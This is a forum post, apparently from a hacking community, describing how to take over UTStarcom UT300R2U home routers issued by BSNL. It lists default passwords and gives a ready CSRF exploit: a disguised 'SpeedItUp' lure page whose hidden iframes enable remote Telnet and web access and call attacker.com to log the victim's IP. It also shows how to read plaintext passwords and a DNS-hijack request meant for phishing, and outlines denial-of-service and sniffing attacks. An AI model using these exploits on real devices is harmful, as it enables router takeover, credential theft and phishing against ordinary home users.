Thread: BSNL Home Routers - UTSTARCOM [UT300R2U]

Tweet

Hello Mates, This is my first post here

Today im going to show you how a series of vulnerabilities in a web Application could be creatively exploited.

Product Description:
The product which i had my hands on is this UTSTARCOM router,

It is one of the most common ADSL Modem cum Router which was rolled out by BSNL to their customers a year ago, when the number of internet subscribers was reaching the peak. This little devices runs a webserver which serves the web based router configuration application.Further it has a Telnet service running on it.

The So Called BuiltIn Security Features :

* Remote Web Access to the router is blocked by Default [so you can't access a victim's router by using his public IP]
* Remote Telnet Access is also blocked

After a little playaround with the device, i've found that there are 3 different users that can login into the router.
viz admin,user,support

The Documentation Provided by BSNL neither states that there are 3 different users that could access the device nor forces/asks/shows the users to change their default password for accessing the router [Note: Im not mentioning the PPoE Password]

http://www.chennai.bsnl.co.in/BBS/UT300R2U.htm

User Description:
As the name suggests, admin user has the ablility to do all configuration changes to the router, whereas the user privileged user could not do any changes in the configuration of the router.

Logged in as Admin:


Logged in as User:


Vulnerablility Description:

On a closer examination of the source code,i got hold of a javascript menuBCM.js

Code:

menuBCM.js: 
  
  function menuAdmin(options) { // All the options are displayed for ADMIN
   var std = options[MENU_OPTION_STANDARD];
   var proto = options[MENU_OPTION_PROTOCOL];
   var firewall = options[MENU_OPTION_FIREWALL];
   var nat = options[MENU_OPTION_NAT];
   var ipExt = options[MENU_OPTION_IP_EXTENSION];
   var wireless = options[MENU_OPTION_WIRELESS];
   var voice = options[MENU_OPTION_VOICE];
   var snmp = options[MENU_OPTION_SNMP];
   var ddnsd = options[MENU_OPTION_DDNSD];
   var sntp = options[MENU_OPTION_SNTP];
.
.
if ( user == 'admin' ) //this piece of code calls the respective menu to be displayed
      menuAdmin(options);
   else if ( user == 'support' )
      menuSupport(options);
   else if ( user == 'user' )
      menuUser();
}
-------------code truncated

so it is pretty obvious from the code that the user privilege management is handled by this javacript by displaying all menu's to Admin and hides configuration menu's to the user.

so it is possible to navigate to the configurations page by a user if he knows the URL

The default username password combination is
admin:admin
user:user

Since we know that the user privilege management is handled by a javascript, it has got nothing to do in a telnet session, so when we telnet as either a admin or as a user, we get full access [privilege] to the router.

Further adding fuel to the fire, CSRF is present in the webbased configuration application

Exploiting Methods:

First and foremost point is we can't access the victim's router from WAN,

As CSRF vulnerability is present on the router, this script will do the job

Code:

http://user:[email protected]/scsrvcntr.cmd?
action=save&http=1&http=3&icmp=1&snmp=1&snmp=3&telnet=1&telnet=3&tftp=2&tftp
=0

Since there user:user account is some sort of hidden/undisclosed account, the possiblity of its default password being changed is very less.

we could send this link to a victim either in a email or by some SE techniques, what this does is, it changes the router configuration and allows Remote Web access, Remote Telnet access on the router.

The entire Exploit looks like this

Code:

index.html

<html>
<head>
<title>SpeedItUp</title>
</head>
<body>
<br><h1>This page configures your system to use high speed internet, please wait for
few seconds for the script to configure</h1></br>
Please click the button to continue.
<iframe src ="config.html" width=70 marginwidth="25%" height=20
scrolling="no" frameborder="0" class="iframe"></iframe>
</body>
</html>

config.html

Code:

<html>
<body onload="window.scrollTo(1440, 980);">
<iframe src="http://user:[email protected]/scsrvcntr.cmd?
action=save&http=1&http=3&icmp=1&snmp=1&snmp=3&telnet=1&telnet=3&tftp=2&tftp
=0"
width=3000 height=1000 frameborder=0></iframe>
<iframe src="http://attacker.com/ip.php"
width=3000 height=1000 frameborder=0></iframe>
</body>
</html>

So after the user visits this page, we will have his IP in our database or somewhere depending upon the IP logger script.
Now we can login into his router either by telnetting or by logging into the webapplication.

Even though the victim changes the admin password for the device, we could log in as user:user and navigate into password.html page and viewing source --Kabboomm Plain text passwords in javascripts

Code:

Source code of password.html

<script language="javascript"> 
<!-- hide
 
   pwdAdmin = 'lame';  //Passwords   for all users are passed in plaintext for comparing
  pwdSupport = 'support';
  pwdUser = 'user';
  function btnApply() {
 var loc = 'password.cgi?';
 with ( document.forms[0] ) {
  var idx = userName.selectedIndex;
  
   switch ( idx ) {
         case 0:
            alert("No username is selected.");
            return;
         case 1:
            if ( pwdOld.value == pwdAdmin )
               break;
            else {
               alert("Old admin password is wrong.");
               return;
            }
         case 2:
            if ( pwdOld.value ==     pwdSupport )
               break;
            else {
               alert("Old support password is wrong.");
        -------------------------- truncated

So now we got admin access on both TELNET service and webservice, now here comes a variety of exploitation techniques


Possible Attacks:

1.Denial of Service:

1.The attacker might implement MAC filtering or other IP restriction on the victim’s router.
2.Specifying a unreachable Static Route
3.Killing the httpd server process of the router repeatedly by telneting into the victim’s router.

2.Sniffing:

1.The attacker could specify a static route passing through his network for the victim’s router and sniff the traffic from the victim. [SSL Strip + Ettercap + Wireshark]


3.Phishing:

This is the attack of our special interest as it is one of the stealthiest attack when combined with routing attacks.
The attacker could specify a fake DNS server for the victim router and could carry out phishing attacks.

Code:

http://192.168.1.1/dnscfg.cgi?dnsPrimary=XX.XX.XX.XX&dnsSecondary=XX.XX.XX.XX&dnsDynamic=0&dnsRefresh=1

XX.XX.XX.XX = Attackers DNS server

This changes the primary & secondary DNS servers of the victim’s router

Now the victim's network is like this



So we can specify our phishing sites IP address as A Records for famous websites like facebook,orkut,banking sites etc etc in our DNS server.



You can download the whitepaper here
Peace.. Similar vulnerablility is found in Nokia-Simens and many other Home Routers
Fairly long post, isn't it ?
Comments and Suggestions are Welcomed.